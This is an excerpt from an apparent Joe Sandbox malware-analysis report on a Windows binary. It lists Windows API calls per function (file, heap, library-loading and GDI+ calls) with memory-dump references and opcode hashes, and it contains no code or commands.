                                                                                              • Instruction Fuzzy Hash: D721F03126C3519FC716CF69D891AABBBE4AF55304F04492CB4E183191D329E90C9B72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A2B1B7,?,?,00A281FD), ref: 00A2A946
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A2B1B7,?,?,00A281FD), ref: 00A2A976
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: fc46117259418a7b0f30c8c2f2da59c07ee4a4d6391dfae7b89ca8cc29ef70c0
                                                                                              • Instruction ID: ebfaba379615d7f771ebfafe92d92d77d74ce39f3cdb7086aaac05c1cdfea4de
                                                                                              • Opcode Fuzzy Hash: fc46117259418a7b0f30c8c2f2da59c07ee4a4d6391dfae7b89ca8cc29ef70c0
                                                                                              • Instruction Fuzzy Hash: 7A2100B14043546FE3308B6ADC88BB776ECEB59321F510A29FAD6C21C1C778A885C672
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A21F35
                                                                                                • Part of subcall function 00A242F1: __EH_prolog.LIBCMT ref: 00A242F6
                                                                                              • _wcslen.LIBCMT ref: 00A21FDA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: e4ed8d644982c5a1281a7aab84526583fa5ad3139e23b7cbd1c50c58f2d91d17
                                                                                              • Instruction ID: 47f3902b98ce857a46a36363f6b98743a0396cfcde6414adbbb01200fb01a020
                                                                                              • Opcode Fuzzy Hash: e4ed8d644982c5a1281a7aab84526583fa5ad3139e23b7cbd1c50c58f2d91d17
                                                                                              • Instruction Fuzzy Hash: 2C218B32904228AFCF15AF98D991AEEFBB6BF18700F10043EF455A36A2CB755951CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx,00000000,?,00A44CAD,00A840C4,00000FA0), ref: 00A44D85
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A44D8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeLibraryProc
                                                                                              • String ID:
                                                                                              • API String ID: 3013587201-0
                                                                                              • Opcode ID: 706d4ccc6848637977d0236fa7fd03b156cc120f834627f0d93df2397a08e844
                                                                                              • Instruction ID: 1729250ae52a2255377f5a8f00b12f5e68745ed6478eeb9f0b24cab55e8e6af2
                                                                                              • Opcode Fuzzy Hash: 706d4ccc6848637977d0236fa7fd03b156cc120f834627f0d93df2397a08e844
                                                                                              • Instruction Fuzzy Hash: 0911B63AA006159FDF22CFA4EC80AAA73B5FF8D3607240269E905DB254E730DD42CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A2B157
                                                                                              • GetLastError.KERNEL32 ref: 00A2B164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 74cfc2eea0c3a30931b42e0168a1500be407fdc796d92bb8e9fe00ece9e95028
                                                                                              • Instruction ID: 772b57039368a27274a32ef82e9c9c200a4d4a18356834bd3d4c7acd2b5f801e
                                                                                              • Opcode Fuzzy Hash: 74cfc2eea0c3a30931b42e0168a1500be407fdc796d92bb8e9fe00ece9e95028
                                                                                              • Instruction Fuzzy Hash: 9911E131610720AFE725CB6CE854BAAB3F9BB04360F604738E1A2935D0E770EE55C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33340
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33351
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A33361
                                                                                                • Part of subcall function 00A33338: _wcslen.LIBCMT ref: 00A3336F
                                                                                                • Part of subcall function 00A33338: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A2C844,?,?,00000000,?,?,?), ref: 00A3338A
                                                                                                • Part of subcall function 00A3BC19: SetCurrentDirectoryW.KERNELBASE(?,00A3BFF6,00A71890,00000000,00A72892,00000006), ref: 00A3BC1D
                                                                                              • _wcslen.LIBCMT ref: 00A3C00F
                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00A72892,00000006), ref: 00A3C048
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                                                              • String ID:
                                                                                              • API String ID: 1016385243-0
                                                                                              • Opcode ID: dbfefc16725a43d2be807564dc19dfd49a05cc2c8bba6e814e74888012645faa
                                                                                              • Instruction ID: 1728dd765e4a95c437fce24707e53e0096b5a73aad5067110a9a7f717d698fcb
                                                                                              • Opcode Fuzzy Hash: dbfefc16725a43d2be807564dc19dfd49a05cc2c8bba6e814e74888012645faa
                                                                                              • Instruction Fuzzy Hash: 83012171D00258AADF21ABA4DE0BEDF72FCAF08740F004465F649F6195EAB496848BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A4A6C5
                                                                                                • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A630C4,00A2187A,?,?,00000007,?,?,?,00A213F2,?,00000000), ref: 00A4A701
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              • Opcode ID: b439ac8ef7580bd9a2af1199a58b3ea675a65daee1f5d8fafd4af6883c1b9469
                                                                                              • Instruction ID: 291382c90c1455f2761e0925c27a7b7dbd077463ea74576a2fd4bb6ec44972e2
                                                                                              • Opcode Fuzzy Hash: b439ac8ef7580bd9a2af1199a58b3ea675a65daee1f5d8fafd4af6883c1b9469
                                                                                              • Instruction Fuzzy Hash: ECF0F63E2C1111A7DB212B26AC01F6BB7689FF1BB1F1B4015F8199A091EF20CC40956B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00A323CA
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A323D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 3d367eb89d6b1250b401b71f3d85828c132d60fcb502bb9b85dbd0a77141a389
                                                                                              • Instruction ID: bdcbd651b49d0d60e825d257ba08a836b5e7a8f2290f098665dfd8c439d9c1de
                                                                                              • Opcode Fuzzy Hash: 3d367eb89d6b1250b401b71f3d85828c132d60fcb502bb9b85dbd0a77141a389
                                                                                              • Instruction Fuzzy Hash: C2E0DF33B10205AB9F098BF4AC05AEFB7ECEA48219B20417AB603E7100F978DD4647A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,?,00000200,?), ref: 00A2F998
                                                                                              • LoadStringW.USER32(?,?,00000200), ref: 00A2F9AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString
                                                                                              • String ID:
                                                                                              • API String ID: 2948472770-0
                                                                                              • Opcode ID: b2f1657fcac287caf362c435f8cb3f6cb801ca1279bbcd2ed9cc23a6211c5164
                                                                                              • Instruction ID: 8fe803cf5c0c2434154455ed354944caf31d9e3e9b661128db484e77c4eccf80
                                                                                              • Opcode Fuzzy Hash: b2f1657fcac287caf362c435f8cb3f6cb801ca1279bbcd2ed9cc23a6211c5164
                                                                                              • Instruction Fuzzy Hash: 23F09E36100115BBDF119FA5EC08DAB7F7AFF067917014435FD0496130D6328965DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B8FA
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A2B5B5,?,?,?,00A2B405,?,00000001,00000000,?,?), ref: 00A2B92B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: d3d23a983359e93ed0abc7d68385c1524748306eff0c17ec7440cb766a846d42
                                                                                              • Instruction ID: 18ae0c71a8b9107c14013941176448e82f40432d4e6033e8f59ba836ad4970c1
                                                                                              • Opcode Fuzzy Hash: d3d23a983359e93ed0abc7d68385c1524748306eff0c17ec7440cb766a846d42
                                                                                              • Instruction Fuzzy Hash: 63F0A931114219BBDF119FA4DC00BDA376CBB183CAF008060BA44D62A4DB31DD959A20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,00000000,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B481
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,00A2A438,?,?,?,?,00A2892B,?,?,?,00A5380F,000000FF), ref: 00A2B4AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: 9e561c23d31988d0f31df87151b065d622c420ccf8b2d3987d4ae924510d8241
                                                                                              • Instruction ID: 78ccc68b384e7047fba242566922a685b41b12f77cc47f6d6aee6bb2c839eb92
                                                                                              • Opcode Fuzzy Hash: 9e561c23d31988d0f31df87151b065d622c420ccf8b2d3987d4ae924510d8241
                                                                                              • Instruction Fuzzy Hash: 9FE09232550359ABEB01ABA4DC41FDA375DBB08386F444031BA45D20A5DB64DDC59A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00A5380F,000000FF), ref: 00A3BDB5
                                                                                              • OleUninitialize.OLE32(?,?,?,?,00A5380F,000000FF), ref: 00A3BDBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 30bb4075e24218f8e4a7fe9f6c913866c13f1e6e70fbc7e462af9c5e07a30081
                                                                                              • Instruction ID: ba0e1f4f738adf5aec74776e0f6db65f01e5fed0781a643a71c2df706ea22773
                                                                                              • Opcode Fuzzy Hash: 30bb4075e24218f8e4a7fe9f6c913866c13f1e6e70fbc7e462af9c5e07a30081
                                                                                              • Instruction Fuzzy Hash: 36E06572504650EFCB14DB58DC09B49FBA9FB88B24F104226F41593760CB746801CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00A3F02C
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00A3F043
                                                                                                • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                                • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                                • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                                • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                                • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: bd38b546bb9da6a5665fcaa10649b424f62964a3d8abc2f70da3845c370c0a8f
                                                                                              • Instruction ID: 16e490f2c5d8d05dca0d39991c99309bab30f5db98ea26d672eeaec8fd2e5a35
                                                                                              • Opcode Fuzzy Hash: bd38b546bb9da6a5665fcaa10649b424f62964a3d8abc2f70da3845c370c0a8f
                                                                                              • Instruction Fuzzy Hash: A4E09B7641425C3ADF01E7A5DD0EF9A36AC5B147C9F040461F641A60A2D6B5D5118F62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B4E4
                                                                                                • Part of subcall function 00A2CF32: _wcslen.LIBCMT ref: 00A2CF56
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,00A2B4CA,?,00A28042,?), ref: 00A2B510
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: d7dcdd5c5f3dd9cf5ef2808b6dd1d856dbc23b545526593d082abd30c88f6c22
                                                                                              • Instruction ID: fea0d76845b335538ec4a7152a577bbf84634a1d6c5fb2099c1af53a4cfd46a4
                                                                                              • Opcode Fuzzy Hash: d7dcdd5c5f3dd9cf5ef2808b6dd1d856dbc23b545526593d082abd30c88f6c22
                                                                                              • Instruction Fuzzy Hash: 2AE092315103686BDB20EB68EC04BDA7758BB093E6F000170FE46E71E5D774AD818AE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: ef2351ecbefcc49d13dcf062b91f21fd6efc7c8536066b5127477af5fe63cdb3
                                                                                              • Instruction ID: 08f87f63e830a621ea70f20f10fd7d9e4d1d14abb6a8fc6200c5f56e918a2676
                                                                                              • Opcode Fuzzy Hash: ef2351ecbefcc49d13dcf062b91f21fd6efc7c8536066b5127477af5fe63cdb3
                                                                                              • Instruction Fuzzy Hash: ADE048769103286BDB119BE5DD04FDA77ACFF0D3C2F0400657645D2048DA74DA84CBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3B3E9
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A3B3F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
